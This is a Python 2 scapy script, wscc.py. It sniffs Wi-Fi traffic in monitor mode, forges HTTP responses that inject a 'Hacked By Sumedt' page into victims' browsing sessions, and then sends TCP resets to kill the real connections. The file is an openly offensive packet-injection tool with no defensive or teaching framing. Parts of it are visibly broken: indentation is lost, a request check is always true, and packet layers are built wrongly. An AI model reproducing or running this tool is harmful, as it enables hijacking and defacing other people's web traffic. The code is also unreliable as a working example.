wscc.py

1. #!/usr/bin/env python
2.  
3. from scapy.all import *
4. from scapy.error import Scapy_Exception
5. import HTTP
6.  
7. ##### Start promicuous mode with airmon-ng start wlan0 11 (airmon-ng start/stop interface channel)
8.  
9. m_iface="mon0"
10.  
11. def pktTCP(pkt):
12. if pkt.haslayer(TCP):
13. if HTTP.HTTPRequest or HTTP.HTTPResponse in pkt:
14. src=pkt[IP].src
15. srcport=pkt[IP].sport
16. dst=pkt[IP].dst
17. dstport=pkt[IP].dport
18. test=pkt[TCP].payload
19. if HTTP.HTTPRequest in pkt:
20. print "HTTP Request:"
21. print "======================================================================"
22. print ("Src: ",src," Sport: ",srcport," Dst: ",dst," Dport: ",dstport," Hostname: ",test.Host)
23. print ("Seq: ",str(pkt[TCP].seq)," | Ack: ",str(pkt[TCP].ack))
24.  
25.  
26.  
27. #### Spoof HTTP Response
28. day=time.strftime("%a, %d %Y %T GMT+7")
29. #print day
30. spoof_Page="<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\"><html><head><title>Hacked</title></head><body><p>Hacked By Sumedt</font></p></body></html>"
31. len_of_page=len(spoof_Page)
32. spoof_HTTP_Response_Header="HTTP/1.1 200 OK\x0d\x0aDate: "+day+"\x0d\x0aContent-Type: text/html; charset=UTF-8\x0d\x0aContent-Length: "+str(len_of_page)+"\x0d\x0a\x0d\x0a"
33. Spoof_Payload=spoof_HTTP_Response_Header+spoof_Page
34.  
35. #### Crafing HTTP Response Packet
36. spoof_response=(Dot11/Ether/IP/TCP/Spoof_Payload)
37. #### Spoof IP
38. spoof_response.dst=pkt[IP].src
39. spoof_response.src=pkt[IP].dst
40. spoof_response.ihl=pkt[IP].ihl
41. spoof_response.proto=pkt[IP].proto
42. #### Spoof Port, Seq, Ack
43. spoof_response.sport=pkt[TCP].dport
44. spoof_response.dport=dport=pkt[TCP].sport
45. spoof_response.seq=pkt[TCP].ack
46. spoof_response.ack=pkt[TCP].seq
47. spoof_response.dataofs=pkt[TCP].dataofs
48. spoof_response.reserved=pkt[TCP].reserved
49. spoof_response.flags="PA",
50. spoof_response.window=pkt[TCP].window
51. spoof_response.options=pkt[TCP].options
52.  
53. spoof_response.FCfield = 2L
54. spoof_response.addr1=pkt.addr2
55. spoof_response.addr2=pkt.addr1
56. print "Spoof Detail: "
57. print ls(spoof_response)
58. send(spoof_response)
59.  
60. #### Send RST-FIN
61. Bye=TCP(sport=80, dport=pkt[TCP].sport, flags="RA", seq=pkt[TCP].ack, ack=pkt[TCP].seq, options=[('MSS', 1460)])
62. ip=IP(src=pkt[IP].dst, dst=pkt[IP].src)
63. send(ip/Bye)
64.  
65.  
66. # if HTTP.HTTPResponse in pkt:
67. # print "HTTP Response Detail:"
68. # print "======================================================================"
69. # print ls(pkt)
70.  
71.  
72. sniff(iface=m_iface,prn=pktTCP)
73. #sniff(filter='tcp',iface=m_iface,prn=pktTCP)